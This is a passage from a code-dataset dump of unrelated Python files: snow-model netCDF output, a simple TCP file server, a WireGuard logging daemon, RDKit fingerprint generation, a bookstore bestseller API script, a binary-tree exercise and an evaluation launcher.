os.path.join(myawsm.pathi, \"in.*\")\n # get precip from ipw\n header = ['hour', 'path']\n df_ppt = pd.read_csv(myawsm.ppt_desc, names=header, sep=' ')\n\n # get list of isnobal outputs and sort by time step\n input_files = sorted(glob.glob(path_inputs), key=os.path.getmtime)\n input_files.sort(key=lambda f: os.path.basename(f).split('in.')[1])\n\n ppt_list = np.zeros(len(df_ppt['path'].values))\n input_list = np.zeros(len(input_files))\n\n # store input and ppt hours in numpy arrays\n for idx, fl in enumerate(input_files):\n input_list[idx] = int(os.path.basename(fl).split('in.')[1])\n for idx, ppt_hr in enumerate(df_ppt['hour'].values):\n ppt_list[idx] = int(ppt_hr)\n\n return input_list, ppt_list\n\n\ndef close_files(force):\n \"\"\"\n Close input netCDF forcing files\n \"\"\"\n\n for f in force.keys():\n if not isinstance(force[f], np.ndarray):\n force[f].close()\n\n\ndef output_files(options, init, start_date, myawsm):\n \"\"\"\n Create the snow and em output netCDF file\n\n Args:\n options: dictionary of Snobal options\n init: dictionary of Snobal initialization images\n start_date: date for time units in files\n myawsm: awsm class\n\n \"\"\"\n fmt = '%Y-%m-%d %H:%M:%S'\n # chunk size\n cs = (6, 10, 10)\n if myawsm.topo.nx < 10:\n cs = (3, 3, 3)\n\n # ------------------------------------------------------------------------\n # EM netCDF\n m = {}\n m['name'] = ['net_rad', 'sensible_heat', 'latent_heat', 'snow_soil',\n 'precip_advected', 'sum_EB', 'evaporation', 'snowmelt',\n 'SWI', 'cold_content']\n m['units'] = ['W m-2', 'W m-2', 'W m-2', 'W m-2', 'W m-2', 'W m-2',\n 'kg m-2', 'kg m-2', 'kg or mm m-2', 'J m-2']\n m['description'] = ['Average net all-wave radiation',\n 'Average sensible heat transfer',\n 'Average latent heat exchange',\n 'Average snow/soil heat exchange',\n 'Average advected heat from precipitation',\n 'Average sum of EB terms for snowcover',\n 'Total evaporation',\n 'Total snowmelt',\n 'Total runoff',\n 'Snowcover cold content']\n\n emname = myawsm.em_name+'.nc'\n # if myawsm.restart_run:\n # emname = 'em_restart_{}.nc'.format(myawsm.restart_hr)\n # start_date = myawsm.restart_date\n\n netcdfFile = os.path.join(options['output']['location'], emname)\n\n if os.path.isfile(netcdfFile):\n myawsm._logger.warning(\n 'Opening {}, data may be overwritten!'.format(netcdfFile))\n em = nc.Dataset(netcdfFile, 'a')\n h = '[{}] Data added or updated'.format(\n datetime.now().strftime(fmt))\n setattr(em, 'last_modified', h)\n\n if 'projection' not in em.variables.keys():\n em = add_proj(em, None, myawsm.topo.topoConfig['filename'])\n\n else:\n em = nc.Dataset(netcdfFile, 'w')\n\n dimensions = ('time', 'y', 'x')\n\n # create the dimensions\n em.createDimension('time', None)\n em.createDimension('y', len(init['y']))\n em.createDimension('x', len(init['x']))\n\n # create some variables\n em.createVariable('time', 'f', dimensions[0])\n em.createVariable('y', 'f', dimensions[1])\n em.createVariable('x', 'f', dimensions[2])\n\n # setattr(em.variables['time'], 'units', 'hours since %s' % options['time']['start_date'])\n setattr(em.variables['time'], 'units', 'hours since %s' % start_date)\n setattr(em.variables['time'], 'time_zone', myawsm.tmz)\n setattr(em.variables['time'], 'calendar', 'standard')\n # setattr(em.variables['time'], 'time_zone', time_zone)\n em.variables['x'][:] = init['x']\n em.variables['y'][:] = init['y']\n\n # em image\n for i, v in enumerate(m['name']):\n # check to see if in output variables\n if v.lower() in myawsm.pysnobal_output_vars:\n # em.createVariable(v, 'f', dimensions[:3], chunksizes=(6,10,10))\n em.createVariable(v, 'f', dimensions[:3], chunksizes=cs)\n setattr(em.variables[v], 'units', m['units'][i])\n setattr(em.variables[v], 'description', m['description'][i])\n\n # add projection info\n em = add_proj(em, None, myawsm.topo.topoConfig['filename'])\n\n options['output']['em'] = em\n\n # ------------------------------------------------------------------------\n # SNOW netCDF\n\n s = {}\n s['name'] = ['thickness', 'snow_density', 'specific_mass', 'liquid_water',\n 'temp_surf', 'temp_lower', 'temp_snowcover',\n 'thickness_lower', 'water_saturation']\n s['units'] = ['m', 'kg m-3', 'kg m-2', 'kg m-2', 'C',\n 'C', 'C', 'm', 'percent']\n s['description'] = ['Predicted thickness of the snowcover',\n 'Predicted average snow density',\n 'Predicted specific mass of the snowcover',\n 'Predicted mass of liquid water in the snowcover',\n 'Predicted temperature of the surface layer',\n 'Predicted temperature of the lower layer',\n 'Predicted temperature of the snowcover',\n 'Predicted thickness of the lower layer',\n 'Predicted percentage of liquid water saturation of the snowcover']\n\n snowname = myawsm.snow_name + '.nc'\n # if myawsm.restart_run:\n # snowname = 'snow_restart_{}.nc'.format(myawsm.restart_hr)\n\n netcdfFile = os.path.join(options['output']['location'], snowname)\n\n if os.path.isfile(netcdfFile):\n myawsm._logger.warning(\n 'Opening {}, data may be overwritten!'.format(netcdfFile))\n snow = nc.Dataset(netcdfFile, 'a')\n h = '[{}] Data added or updated'.format(\n datetime.now().strftime(fmt))\n setattr(snow, 'last_modified', h)\n\n if 'projection' not in snow.variables.keys():\n snow = add_proj(snow, None, myawsm.topo.topoConfig['filename'])\n\n else:\n dimensions = ('time', 'y', 'x')\n\n snow = nc.Dataset(netcdfFile, 'w')\n\n # create the dimensions\n snow.createDimension('time', None)\n snow.createDimension('y', len(init['y']))\n snow.createDimension('x', len(init['x']))\n\n # create some variables\n snow.createVariable('time', 'f', dimensions[0])\n snow.createVariable('y', 'f', dimensions[1])\n snow.createVariable('x', 'f', dimensions[2])\n\n setattr(snow.variables['time'], 'units', 'hours since %s' % start_date)\n setattr(snow.variables['time'], 'time_zone', myawsm.tmz)\n setattr(snow.variables['time'], 'calendar', 'standard')\n # setattr(snow.variables['time'], 'time_zone', time_zone)\n snow.variables['x'][:] = init['x']\n snow.variables['y'][:] = init['y']\n\n # snow image\n for i, v in enumerate(s['name']):\n # check to see if in output variables\n if v.lower() in myawsm.pysnobal_output_vars:\n snow.createVariable(v, 'f', dimensions[:3], chunksizes=cs)\n # snow.createVariable(v, 'f', dimensions[:3])\n setattr(snow.variables[v], 'units', s['units'][i])\n setattr(snow.variables[v], 'description', s['description'][i])\n\n # add projection info\n snow = add_proj(snow, None, myawsm.topo.topoConfig['filename'])\n\n options['output']['snow'] = snow\n\n\ndef output_timestep(s, tstep, options, output_vars):\n \"\"\"\n Output the model results for the current time step\n\n Args:\n s: dictionary of output variable numpy arrays\n tstep: datetime time step\n options: dictionary of Snobal options\n\n \"\"\"\n\n em_out = {'net_rad': 'R_n_bar', 'sensible_heat': 'H_bar',\n 'latent_heat': 'L_v_E_bar',\n 'snow_soil': 'G_bar', 'precip_advected': 'M_bar',\n 'sum_EB': 'delta_Q_bar', 'evaporation': 'E_s_sum',\n 'snowmelt': 'melt_sum', 'SWI': 'ro_pred_sum',\n 'cold_content': 'cc_s'}\n snow_out = {'thickness': 'z_s', 'snow_density': 'rho',\n 'specific_mass': 'm_s', 'liquid_water': 'h2o',\n 'temp_surf': 'T_s_0', 'temp_lower': 'T_s_l',\n 'temp_snowcover': 'T_s', 'thickness_lower': 'z_s_l',\n 'water_saturation': 'h2o_sat'}\n\n # preallocate\n em = {}\n snow = {}\n\n # gather all the data together\n for key, value in em_out.items():\n em[key] = copy(s[value])\n\n for key, value in snow_out.items():\n snow[key] = copy(s[value])\n\n # convert from K to C\n snow['temp_snowcover'] -= FREEZE\n snow['temp_surf'] -= FREEZE\n snow['temp_lower'] -= FREEZE\n\n # now find the correct index\n # the current time integer\n times = options['output']['snow'].variables['time']\n # offset to match same convention as iSnobal\n tstep -= pd.to_timedelta(1, unit='h')\n t = nc.date2num(tstep.replace(tzinfo=None), times.units, times.calendar)\n\n if len(times) != 0:\n index = np.where(times[:] == t)[0]\n if index.size == 0:\n index = len(times)\n else:\n index = index[0]\n else:\n index = len(times)\n\n # insert the time\n options['output']['snow'].variables['time'][index] = t\n options['output']['em'].variables['time'][index] = t\n\n # insert the data\n for key in em_out:\n if key.lower() in output_vars:\n options['output']['em'].variables[key][index, :] = em[key]\n for key in snow_out:\n if key.lower() in output_vars:\n options['output']['snow'].variables[key][index, :] = snow[key]\n\n # sync to disk\n options['output']['snow'].sync()\n options['output']['em'].sync()\n","sub_path":"awsm/interface/pysnobal_io.py","file_name":"pysnobal_io.py","file_ext":"py","file_size_in_byte":12600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192467001","text":"import socket\nfrom threading import Thread\nfrom lib.common import UPLOAD, DOWNLOAD, socket_tcp, FileManager\n\n\nclass connection_instance:\n\n def __init__(self, cli, dir_path, printer):\n self.client = cli\n self.closed = False\n self.printer = printer\n self.file_manager = FileManager(dir_path)\n printer.print_connection_established(cli.addr)\n\n # server side of the upload protocol\n def _server_upload_protocol(self):\n\n name = self.client.wait_for_name()\n size = self.client.wait_for_size()\n\n path = self.file_manager.SERVER_BASE_PATH + name\n file = self.file_manager.open_file(path=path, how='wb')\n self.client.recv_file(file, size)\n file.close()\n\n # server side of the download protocol\n def _server_download_protocol(self):\n\n path = self.client.wait_for_name()\n\n file = self.file_manager.open_file(path=path, how='rb')\n size = self.file_manager.get_size(file)\n self.client.send_size(size)\n\n self.client.send_file(file, size)\n file.close()\n\n # choose handler for the request\n def dispatch_request(self, request):\n if request == UPLOAD:\n self._server_upload_protocol()\n elif request == DOWNLOAD:\n self._server_download_protocol()\n else:\n raise(ConnectionAbortedError)\n\n # listen for what the client wants to do\n def listen_request(self):\n try:\n request = self.client.wait_for_request()\n request = self.dispatch_request(request)\n except (ConnectionAbortedError, ConnectionResetError,\n ValueError):\n self.printer.print_connection_aborted(printStackTrace=False)\n except FileNotFoundError:\n self.printer.print_file_not_found()\n finally:\n self._close()\n\n def run(self):\n self.thread = Thread(target=self.listen_request)\n self.thread.start()\n\n # closes the socket, for internal use only\n def _close(self):\n self.client.close()\n self.printer.print_connection_finished(self.client.addr)\n self.printer.print_connection_stats(self.client.bytes_sent,\n self.client.bytes_recv,\n self.client.time_alive)\n\n # closes the socket and joins the thread\n # for external use only\n def close(self):\n self._close()\n if self.thread:\n self.thread.join()\n self.thread = False\n\n # asks whether thread is done and joins it if necessary\n # for external use only\n def finished(self):\n if self.client.closed:\n self.close()\n return self.client.closed\n\n\ndef serve(host, port, dir_path, printer):\n addr = (host, port)\n active_connections = []\n\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.bind(addr)\n sock.listen(1)\n printer.print_listening_on(addr)\n\n while True:\n conn, addr = sock.accept()\n # cull list from dead connections\n active_connections[:] = [c for c in active_connections\n if not c.finished()]\n\n if not conn:\n break\n\n ci = connection_instance(socket_tcp(conn, addr), dir_path, printer)\n ci.run()\n active_connections.append(ci)\n\n except KeyboardInterrupt:\n\n if sock:\n sock.close()\n for cli in active_connections:\n cli.close()\n","sub_path":"tp1/src/lib/server_tcp.py","file_name":"server_tcp.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"533545073","text":"#!/usr/bin/python3\n\n\"\"\"\nWirelogd is a logging daemon for WireGuard.\n\nSince WireGuard itself does not log the state of its peers (and since it is UDP\nbased so, there no concept of \"connection state\"), Wirelogd relies on the\nlatest handshake to determine if a peer is active or inactive. While there is\ntrafic the handshake should be renewed every 2 minutes. If there is no trafic,\nhandshake is not renewed. Based on this behavior we assume that if there is no\nnew handshake after a while (default Wirelogd timeout value is 5 minutes), the\nclient is probably inactive.\n\"\"\"\n\nimport argparse\nimport configparser\nimport json\nimport logging\nimport os\nimport pathlib\nimport subprocess # nosec\nimport sys\nimport time\nfrom functools import lru_cache\n\n\n@lru_cache(maxsize=6)\ndef booly(value: str) -> bool:\n \"\"\"Return a boolean from values like 'yes', 'no', etc.\"\"\"\n truthy_values = (\n '1',\n 'on',\n 'enable',\n 'enabled',\n 'true',\n 'yes',\n )\n\n return str(value).lower() in truthy_values\n\n\ndef config_from_defaults(struct: tuple) -> dict:\n \"\"\"Return dict from defaults.\"\"\"\n return {x: y for x, _, y in struct}\n\n\ndef config_from_file(struct: tuple, config_path: str) -> dict:\n \"\"\"Return dict from configparser.\"\"\"\n configfile = configparser.ConfigParser()\n if not pathlib.Path(config_path).exists():\n return {}\n configfile.read(config_path)\n\n return {\n x: y(configfile.get('wirelogd', x))\n for x, y, _ in struct\n if configfile.get('wirelogd', x, fallback=None)\n }\n\n\ndef config_from_environment(struct: tuple) -> dict:\n \"\"\"Return dict from environment.\"\"\"\n return {\n x: y(os.environ['WIRELOGD_' + x.upper().replace('-', '_')])\n for x, y, _ in struct\n if os.getenv('WIRELOGD_' + x.upper().replace('-', '_'))\n }\n\n\ndef config_from_args(struct: tuple, args: argparse.Namespace) -> dict:\n \"\"\"Return dict from args.\"\"\"\n return {\n x: y(getattr(args, x.replace('-', '_')))\n for x, y, _ in struct\n if (\n hasattr(args, x.replace('-', '_'))\n and getattr(args, x.replace('-', '_'))\n )\n }\n\n\ndef parse_config(struct: tuple, path: str, args: argparse.Namespace) -> dict:\n \"\"\"Return config from: args > environment > configfile > defaults.\"\"\"\n config: dict = {}\n\n # set defaults\n config_defaults = config_from_defaults(struct)\n config.update(config_defaults)\n\n # set from configuration file\n config_file = config_from_file(struct, path)\n config.update(config_file)\n\n # set from environment variables\n config_env = config_from_environment(struct)\n config.update(config_env)\n\n # set from command-line arguments\n config_args = config_from_args(struct, args)\n config.update(config_args)\n\n return config\n\n\n@lru_cache(maxsize=128)\ndef link_wggw(path: str, pubkey: str) -> str:\n \"\"\"Return name from wg-gen-web config matching with public key.\"\"\"\n files = pathlib.Path(path).glob('*-*-*-*-*')\n for conf_path in files:\n with open(conf_path) as conf_fp:\n conf = json.load(conf_fp)\n if conf['publicKey'] == pubkey:\n return conf['name']\n\n return 'unknown'\n\n\ndef peer_dict(peer: list, wggw: bool, wggw_path: str) -> dict:\n \"\"\"Return structured dict from wg peer dump line.\"\"\"\n fpeer = {\n 'interface': peer[0],\n 'public-key': peer[1],\n 'endpoint': peer[3],\n 'allowed-ips': peer[4],\n 'latest-handshake': float(peer[5]),\n 'name': 'unknown',\n }\n\n if wggw and wggw_path:\n fpeer['name'] = link_wggw(wggw_path, fpeer['public-key'])\n\n return fpeer\n\n\ndef get_peers(sudo: bool, wggw: bool, wggw_path: str) -> tuple:\n \"\"\"Return list of peers, each peer as dict of informations.\"\"\"\n # run command\n cmd = ['wg', 'show', 'all', 'dump']\n if sudo:\n cmd.insert(0, 'sudo')\n try:\n res = subprocess.run(cmd, capture_output=True, check=True) # nosec\n except subprocess.CalledProcessError:\n sys.exit('executing `%s` failed' % ' '.join(cmd))\n except FileNotFoundError:\n sys.exit('wireguard-tools are not installed')\n\n # filter and format peers (client peers have 9 columns)\n peers_list = [\n x.split()\n for x in res.stdout.decode().strip().split('\\n')\n if len(x.split()) == 9\n ]\n peers = tuple(peer_dict(x, wggw, wggw_path) for x in peers_list)\n\n return peers\n\n\ndef check_timeout(peer: dict, timeout: int) -> bool:\n \"\"\"Return True if timeout is reached.\"\"\"\n # elapsed time between now and latest peer handshake\n elapsed_time = time.time() - peer['latest-handshake']\n expired = elapsed_time > timeout\n\n return expired\n\n\ndef run_loop(config: dict, log: logging.Logger):\n \"\"\"Run loop executing actions and logging results.\"\"\"\n # initialize activity state tracking\n activity_state: dict = {}\n\n log.info('starting wirelodg')\n while True:\n peers = get_peers(\n config['sudo'],\n config['wg-gen-web'],\n config['wg-gen-web-path'],\n )\n log.debug('%s', peers)\n for peer in peers:\n key = f\"{peer['public-key']}-{peer['interface']}\"\n was_active = activity_state.get(key, False)\n timedout = check_timeout(peer, config['timeout'])\n if was_active and timedout:\n # log inactive connection\n activity_state[key] = False\n log.info(\n '%s - %s - %s - %s - %s - inactive',\n peer['name'],\n peer['public-key'],\n peer['endpoint'],\n peer['allowed-ips'],\n peer['interface'],\n )\n elif not was_active and not timedout:\n # log new active connection\n activity_state[key] = True\n log.info(\n '%s - %s - %s - %s - %s - active',\n peer['name'],\n peer['public-key'],\n peer['endpoint'],\n peer['allowed-ips'],\n peer['interface'],\n )\n log.handlers[0].flush()\n time.sleep(config['refresh'])\n\n\ndef setup_parser() -> argparse.ArgumentParser:\n \"\"\"Set the main arguments.\"\"\"\n parser = argparse.ArgumentParser(prog='wirelogd', description=__doc__)\n parser.add_argument(\n '--config', '-c',\n help='path to configuration file',\n metavar='str',\n )\n parser.add_argument(\n '--debug', '-d',\n help='enable debug logging',\n action='store_true',\n )\n parser.add_argument(\n '--refresh', '-r',\n help='refresh interval in seconds',\n type=int,\n metavar='int',\n )\n parser.add_argument(\n '--sudo', '-s',\n help='run subprocess commands with sudo',\n action='store_true',\n )\n parser.add_argument(\n '--timeout', '-t',\n help='wireguard handshake timeout in seconds',\n type=int,\n metavar='int',\n )\n parser.add_argument(\n '--wg-gen-web', '-w',\n help='link peer with its wg-gen-web config name',\n action='store_true',\n )\n parser.add_argument(\n '--wg-gen-web-path',\n help='path where wg-gen-web store its config files',\n metavar='str',\n )\n\n return parser\n\n\ndef setup_config(args: argparse.Namespace) -> dict:\n \"\"\"Set the main configuration.\"\"\"\n config_struct = (\n # settings, type to cast, default\n ('debug', booly, False),\n ('refresh', int, 5),\n ('sudo', booly, False),\n ('timeout', int, 300),\n ('wg-gen-web', booly, False),\n ('wg-gen-web-path', str, '/etc/wireguard/'),\n )\n\n config_path = (\n args.config\n or os.getenv('WIRELOGD_CONFIG')\n or '/etc/wirelogd.cfg'\n )\n\n config = parse_config(config_struct, config_path, args)\n\n return config\n\n\ndef setup_logger(config: dict) -> logging.Logger:\n \"\"\"Set the main logger.\"\"\"\n log_level = logging.DEBUG if config['debug'] else logging.INFO\n\n log_format = logging.Formatter('%(levelname)s - %(message)s')\n\n log_stream = logging.StreamHandler()\n log_stream.setFormatter(log_format)\n log_stream.setLevel(log_level)\n\n logger = logging.getLogger('wirelogd')\n logger.setLevel(log_level)\n logger.addHandler(log_stream)\n\n return logger\n\n\ndef main():\n \"\"\"Run main instructions.\"\"\"\n try:\n args = setup_parser().parse_args()\n config = setup_config(args)\n log = setup_logger(config)\n\n run_loop(config, log)\n except KeyboardInterrupt:\n sys.exit(0)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"wirelogd/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"347332782","text":"from scipy import sparse\nimport numpy as np\nimport pandas as pd\nimport mmh3\n\nfrom joblib import Parallel, delayed\n\nfrom rdkit import Chem\nfrom rdkit.Chem.rdReducedGraphs import GetErGFingerprint\nfrom rdkit.Chem import rdFingerprintGenerator, MACCSkeys\nfrom rdkit.Chem.rdmolops import PatternFingerprint, LayeredFingerprint, RDKFingerprint\nfrom rdkit.Chem.Pharm2D import Gobbi_Pharm2D,Generate\n\ndef makeMols(num=None):\n smiles = pd.read_csv('./raw_data/allSmiles.csv', header=None)\n mols = list()\n for smile in smiles[0].iloc[0:num]:\n mols.append(Chem.MolFromSmiles(smile))\n return np.array(mols)\n\ndef get_reduced_graphs(mols):\n fps = list()\n for mol in mols:\n fps.append(GetErGFingerprint(mol))\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('float')\n\ndef get_maccs(mols):\n fps = list()\n for mol in mols:\n fps.append(np.array(MACCSkeys.GenMACCSKeys(mol)))\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_rdk_fps(mols):\n fps = list()\n for mol in mols:\n fps.append(np.array(RDKFingerprint(mol)))\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_pattern_fps(mols):\n fps = list()\n for mol in mols:\n fps.append(np.array(PatternFingerprint(mol)))\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_layered_fps(mols):\n fps = list()\n for mol in mols:\n fps.append(np.array(LayeredFingerprint(mol)))\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_2dpharm(mols, fp_size=2000):\n factory = Gobbi_Pharm2D.factory\n fps = list()\n for mol in mols:\n try:\n sig = Generate.Gen2DFingerprint(mol,factory)\n indices = np.array([mmh3.hash(str(i)) for i in sig.GetOnBits()])%fp_size\n fp = np.zeros(fp_size, dtype=int)\n if len(indices)>0:\n fp[indices]=1\n fps.append(fp)\n except Exception:\n print('ERROR')\n print(Chem.MolToSmiles(mol))\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_atom_pair(mols):\n gen_ap = rdFingerprintGenerator.GetAtomPairGenerator()\n fps = list()\n for mol in mols:\n fp = np.array(gen_ap.GetFingerprint(mol))\n fps.append(fp)\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_topological_torsion(mols):\n gen_tt = rdFingerprintGenerator.GetTopologicalTorsionGenerator()\n fps = list()\n for mol in mols:\n fp = np.array(gen_tt.GetFingerprint(mol))\n fps.append(fp)\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_morgan(mols):\n gen_mo = rdFingerprintGenerator.GetMorganGenerator()\n fps = list()\n for mol in mols:\n fp = np.array(gen_mo.GetFingerprint(mol))\n fps.append(fp)\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_morgan_features(mols):\n invGen =rdFingerprintGenerator.GetMorganFeatureAtomInvGen()\n gen_mo = rdFingerprintGenerator.GetMorganGenerator(atomInvariantsGenerator=invGen)\n fps = list()\n for mol in mols:\n fp = np.array(gen_mo.GetFingerprint(mol))\n fps.append(fp)\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\nif __name__ == '__main__':\n\n mols = makeMols()\n\n #These ones are pickleable:\n funcs = [get_2dpharm, get_maccs, get_atom_pair, get_topological_torsion,\n get_morgan, get_morgan_features]\n names = ['2dpharm', 'maccs', 'atom_pair', 'topo_torsion',\n 'morgan', 'morgan_feat']\n n_jobs = 8\n for func, name in zip(funcs, names):\n print(f'Making {name} fingerprints')\n split_fps = Parallel(n_jobs=n_jobs)(delayed(func)(i) for i in np.array_split(mols, n_jobs))\n fps = sparse.vstack([*split_fps])\n sparse.save_npz('./processed_data/fingerprints/'+name+'.npz', fps)\n\n\n #these ones are not pickleable:\n funcs = [get_reduced_graphs, get_rdk_fps, get_pattern_fps,\n get_layered_fps]\n names = ['erg', 'rdk', 'pattern', 'layered']\n for func, name in zip(funcs, names):\n print(f'Making {name} fingerprints')\n fps = func(mols)\n sparse.save_npz('./processed_data/fingerprints/'+name+'.npz', fps)\n","sub_path":"code/make_fingerprints.py","file_name":"make_fingerprints.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"177500824","text":"# -*- coding: utf-8 -*-\r\n\r\nimport requests\r\nimport json\r\n\r\nfrom urllib.request import urlopen\r\n#이인터파크 api 키\r\nInterpark_API_KEY = \"key=[Interpark_API_KEY]\"\r\n#카테고리번호\r\ncategoryId = '100'\r\n#print(search_result)\r\n\r\n\r\n\r\n#카테고리를 선택한다.\r\n#인문 - 119, 자연과학 - 116, 경제경영 - 117, 자기계발 - 118, 취미/레저 - 124\r\n#\r\n\r\n\r\n#categoryID를 입력하면 해당카테고리 베스트셀러리스트를 보여준다.\r\n\r\ndef CategorySearch(category):\r\n if category == '인문':\r\n categoryId = '119'\r\n elif category == '자연과학':\r\n categoryId = '116'\r\n elif category == '경제경영':\r\n categoryId = '117'\r\n elif category == '자기계발':\r\n categoryId = '118'\r\n elif category == '취미/레저':\r\n categoryId = '124'\r\n else:\r\n print(\"카테고리명을 다시 입력해주세요.\")\r\n \r\n #리스트 만들어주고 가져온 정보에서 타이틀만 넣어주기.\r\n request = requests.get('http://book.interpark.com/api/bestSeller.api?'+Interpark_API_KEY+'&categoryId='+categoryId+'&output=json')\r\n #best = request.encoding\r\n #print(\"Best:\", request.encoding)\r\n #best = request.content\r\n \r\n #best = request.text\r\n #print(\"best:\",best, \"type:\",type(best))\r\n #best.decode('utf-8','ignore')\r\n \r\n #best = request.text\r\n #print(\"type:\",type(best))\r\n #best.encode(\"utf-8\")\r\n #print(\"best:\",best)\r\n best = request.content.decode('utf-8')\r\n search_result = json.loads(best)\r\n\r\n api_lists = []\r\n #필요항목 추출\r\n for i in range(len(search_result['item'])):\r\n title = search_result['item'][i]['title']\r\n author = search_result['item'][i]['author']\r\n publisher = search_result['item'][i]['publisher']\r\n link = search_result['item'][i]['link']\r\n api_lists.append('제목: ' + title +' 저자: '+ author +' 출판사: '+ publisher + link)\r\n print(\"api_lists:\",api_lists)\r\n\r\n #목록코드에 따른 항목변화.\r\n if categoryId == '119':\r\n category = '인문'\r\n elif categoryId == '116':\r\n category = '자연과학'\r\n elif categoryId == '117':\r\n category = '경제경영'\r\n elif categoryId == '118':\r\n category = '자기계발'\r\n elif categoryId == '124':\r\n category = '취미/레저'\r\n print('{NAME} 관련 베스트 셀러 목록입니다.'.format(NAME=category))\r\n #리스트 전부 가져오지만\r\n for index, api_list in enumerate(api_lists):\r\n api_list = api_lists[index]\r\n text = api_list\r\n no = str(index+1)+\". \"\r\n print(\"no:\",no)\r\n \r\n #9번까지만제한.\r\n if index==9:\r\n break\r\n\r\ndef search(chat_id, code):\r\n #해당 카테고리 도서 불러오기.\r\n interpark_API_KEY = \"key=[Interpark_API_KEY]\"\r\n request = requests.get('http://book.interpark.com/api/bestSeller.api?'+interpark_API_KEY+'&categoryId='+code+'&output=json')\r\n genre = request.content.decode('utf-8')\r\n search_result = json.loads(genre)\r\n book_list = []\r\n #필요항목 추출\r\n for i in range(len(search_result['item'])):\r\n title = search_result['item'][i]['title']\r\n author = search_result['item'][i]['author']\r\n publisher = search_result['item'][i]['publisher']\r\n #description = search_result['item'][i]['description']\r\n link = search_result['item'][i]['link']\r\n \r\n book_list.append('<제목: ' + title +' \\r\\n저자: '+ author +' 출판사: '+ publisher + ' 링크: '+ link)\r\n \r\n #api에서 가져온 book_list의 데이터 랜덤으로 섞어준다.\r\n random.shuffle(book_list)\r\n \r\n #5개만 출력\r\n for index, book_info in enumerate(book_list):\r\n book_info = str(book_list[index])\r\n print(\"book_info:\",index+1, book_info)\r\n params = {'chat_id':chat_id, 'text': book_info, 'parse_mode':'HTML'}\r\n response = requests.post(url, json=params) \r\n print(\"response\",response)\r\n #5번까지만제한.\r\n if index==4:\r\n break\r\n \r\n \r\n#번호 스트링 타입으로 넣어주기\r\n#인문\r\n#CategorySearch('인문')\r\n\r\nsearch('954489427','119')\r\n","sub_path":"Chaek_Bot/InterparkAPI.py","file_name":"InterparkAPI.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535200646","text":"\"\"\"\n将一个按照升序排列的有序数组,转换为一棵高度平衡二叉搜索树。\n本题中,一个高度平衡二叉树是指一个二叉树每个节点的左右两个子树的高度差的绝对值不超过 1。\n\n示例:\n给定有序数组: [-10,-3,0,5,9],\n\n一个可能的答案是:[0,-3,9,-10,null,5],它可以表示下面这个高度平衡二叉搜索树:\n\n 0\n / \\\n -3 9\n / /\n -10 5\n\n\n\"\"\"\n\n\"\"\"\n思路分析:\nDFS,递归,用二分的思想。\n\"\"\"\n#我的做法\n\nclass Solution:\n def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n maxlength=len(nums)\n def DFS(left,right):\n if left>right:\n return\n mid=(left+right)//2\n root=TreeNode(nums[mid])\n root.left=DFS(left,mid-1)\n root.right=DFS(mid+1, right)\n return root\n return DFS(0, maxlength-1)\n\n\n\n\n\n","sub_path":"108、将有序数组转换为二叉搜索树.py","file_name":"108、将有序数组转换为二叉搜索树.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"291747005","text":"import os\nimport sys\nimport glob\nimport tempfile\nimport subprocess\nimport pickle\nimport json\n\n\nROOT = '/data/vision/torralba/distillation/S2V/'\n# IMAGE_ROOT = \"/data/vision/torralba/scratch2/stevenliu/GAN_stability/fid_samples\"\n\n\n\ndef get_cmd(desc, BS=400, TASK='MR+CR+SUBJ+MPQA', GLOVE_PATH=\"dictionaries/GloVe\", ST_DATA='./ST_data', RESULTS_HOME='results/BC'):\n return [\n sys.executable, '-u', 'src/evaluate.py',\n f'--eval_task={TASK}',\n f'--data_dir={ST_DATA}',\n f'--model_config=model_configs/BS400-W620-S1200-case-bidir-norm/{desc}/eval.json',\n f'--results_path=results/BC',\n f'--eval_dir=results/BC/BS400-W620-S1200-case-bidir-norm/{desc}/eval',\n f'--Glove_path={GLOVE_PATH}',\n ]\n\n # python src/evaluate.py \\\n # --eval_task=MR+CR \\\n # --data_dir=./ST_data \\\n # --model_config='model_configs/BS400-W620-S1200-case-bidir/eval.json' \\\n # --results_path='results/BC' \\\n # --eval_dir='results/BC/BS400-W620-S1200-case-bidir/eval' \\\n # --Glove_path='dictionaries/GloVe'\n\ndef run_cmd(cmd):\n with subprocess.Popen(cmd,\n stdout=subprocess.PIPE, cwd=ROOT,\n bufsize=1, universal_newlines=True,\n encoding='utf-8') as p:\n for line in p.stdout:\n print(line, end='', flush=True)\n\n if p.returncode != 0:\n raise subprocess.CalledProcessError(p.returncode, p.args)\n\n\nif __name__ == '__main__':\n desc = sys.argv[1]\n TASK = os.environ.get('TASK', 'MR+CR')\n cmd = get_cmd(desc, TASK=TASK)\n print()\n print()\n print(' \\\\\\n\\t'.join(cmd))\n print()\n print()\n 